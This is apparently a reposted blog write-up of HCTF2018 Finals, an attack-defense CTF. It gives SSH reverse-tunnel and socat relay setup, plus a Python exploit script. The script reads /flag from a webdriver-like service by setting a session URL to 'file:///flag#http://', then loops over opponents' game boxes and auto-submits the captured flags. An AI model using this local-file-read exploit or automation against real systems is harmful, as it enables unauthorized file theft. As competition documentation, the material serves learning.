美文网首页
HCTF2018 Finals

HCTF2018 Finals

作者: Kirin_say | 来源:发表于2018-12-20 13:47 被阅读54次

prepare

Router:

set route&&make outer in:
PS C:\WINDOWS\system32> route print
PS C:\WINDOWS\system32> route add 192.168.0.0 mask 255.255.0.0 192.168.17.1
#windows:teamviewer

Something for pwn:

for localhost:
# localhost:6666 <---> remote:8888     by ssh tunnel
ssh -CqTfnN -R 8888:localhost:6666 ctf@192.168.100.100
# localhost:6666  <--->  remoteaddr:remote_port(others or local fake pwn)
socat tcp-listen:6666,fork tcp:192.168.125.125:10001

for remote:
binary:
#!/bin/bash

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/tmp/socat
/tmp/socat/socat - tcp-connect:localhost:8888

for result:
GameBox Stdin <---> GameBox:8888 <---> localhost:6666  <--->  remoteaddr:remote_port

Something wrong with run.sh:

#!/bin/sh
ulimit -p 30
/usr/bin/timeout 120 /chall/bindriver/bindriver

pwn1

import requests
import json
import time, hashlib
import re
from pwn import *

def submit_flag(flag):
    token = "61c3c716165073254315e347a895fb279514e0cb"
    url = "http://192.168.200.150:8005/api/team/submit/"+token
    h = {
        "Content-Type":"application/json"
    }
    d = { "flag" : flag }
    d = json.dumps(d)
    print d
    r = requests.post(url, data=d,headers=h)
    print r.text

def get_flag(port):
    try:
        #context.log_level='debug'
        #p=process("./bindriver")
        p=remote("192.168.100.100",port)
        #p.sendline("POST / HTTP/1.1\nHost: 192.168.100.100")
        #gdb.attach(p)
        p.sendline("GET /status\n \nConnection: Keep-Alive\nHost: localhost")
        #gdb.attach(p)
        p.recvuntil("}\n")
        p.sendline("POST /session\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("\"sessionId\": \"")
        session=p.recv(8)
        print session
        p.recvuntil("}\n")
        p.send("POST /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost\n{\"url\": \"file:///flag#http://\"}")  
        p.recvuntil("}\n")
        p.sendline("GET /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("}\n")
        p.sendline("GET /session/"+session+"/source\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("source\": \"")
        flag=p.recvuntil("}")
        print flag
        return flag
    except:
        return None

def main():
    for ip in range(1,12):
        port = 20100+ip
        flag = get_flag(port)
        if flag != None:
            submit_flag(flag)
        
if __name__ == "__main__":
#    while 1:
        main()
#        time.sleep(5)
#        print "-"*20

相关文章

  • HCTF2018 Finals

    prepare Router: Something for pwn: Something wrong with ...

  • 🐣积累单词

    cultivate 培养finals 决赛 Analogy a comparison between two th...

  • BUUOJ刷题

    0x01 WarmUp 出处:HCTF2018 要使emmm::checkFile($_REQUEST['fil...

  • hctf2018

    打开题目,f12发现 以及hint和link:http://warmup.2018.hctf.io/index.p...

  • [GM2] Warriors vs Cavaliers Live

    watch. nba. finals. 2016. online. Warriors vs Cavaliers,l...

  • HCTF2018 WarmUp

    buuctf第一题。打开页面看到一个滑稽表情,f12发现提示source.php进入该页面,发现是代码审计,代码如...

  • KCTF 2019 Finals

    一鼓作气,再而衰,三而竭orz开始准备AK,后面因为参加D3CTF Finals断层,陆陆续续就没有怎么做了 0x...

  • TCTF Finals in Shanghai

    上海之行结束,又一次感受到自己和master of pwn的差距,细数下来,近半年的比赛好像都没去复现,其...

  • 2018-XCTF Finals

    跟随航神、肖神等一众大神参加了2018 XCTF Finals虽然最后成绩不太好(我就是唯一拖后腿那个),但跟着大...

  • Finals Week 冬季恋歌

    每次进门,都能看到我那盆抽出新枝新叶的棕榈。一对新枝从中心伸上来,慢慢向两侧舒展出叶片。这棵棕榈去年Tamra 送...

网友评论

      本文标题:HCTF2018 Finals

      本文链接:https://www.haomeiwen.com/subject/qkpskqtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|HCTF2018 Finals|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!